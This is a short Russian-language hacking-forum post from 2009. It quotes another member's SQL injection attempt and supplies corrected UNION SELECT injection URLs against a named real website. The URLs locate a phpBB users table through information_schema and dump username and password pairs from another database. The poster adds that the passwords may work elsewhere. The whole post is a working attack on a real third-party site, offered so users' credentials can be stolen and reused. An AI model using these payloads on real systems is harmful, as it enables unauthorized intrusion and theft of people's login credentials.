27.06.2009, 12:57
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
Сообщение от GOGA075
подскажите у меня руки кривые или вывода нет??
http://www.emag.ru/pr.php?pr=-10+union+select+1,concat_ws(char(58),username,user _password),3,4,5,6,7,8,9,10+FROM+phpbb_users+limit +5,1000
таблица phpbb_users находится в базе данных SC:
Код:
http://www.emag.ru/pr.php?pr=-10+union+select+1,TABLE_SCHEMA,3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_name=char(0x70687062,0x625f7573,0x657273)
причем доступа туда нет. Но легко можно прочитать записи из таблицы phpbb_users1, что в базе данных acom:
Код:
http://www.emag.ru/pr.php?pr=-10+union+select+1,concat(username,0x3a,user_password),3,4,5,6,7,8,9,10+from+acom.phpbb_users1+limit+1,1
может эти пароли куда-то и подойдут 
|
|
|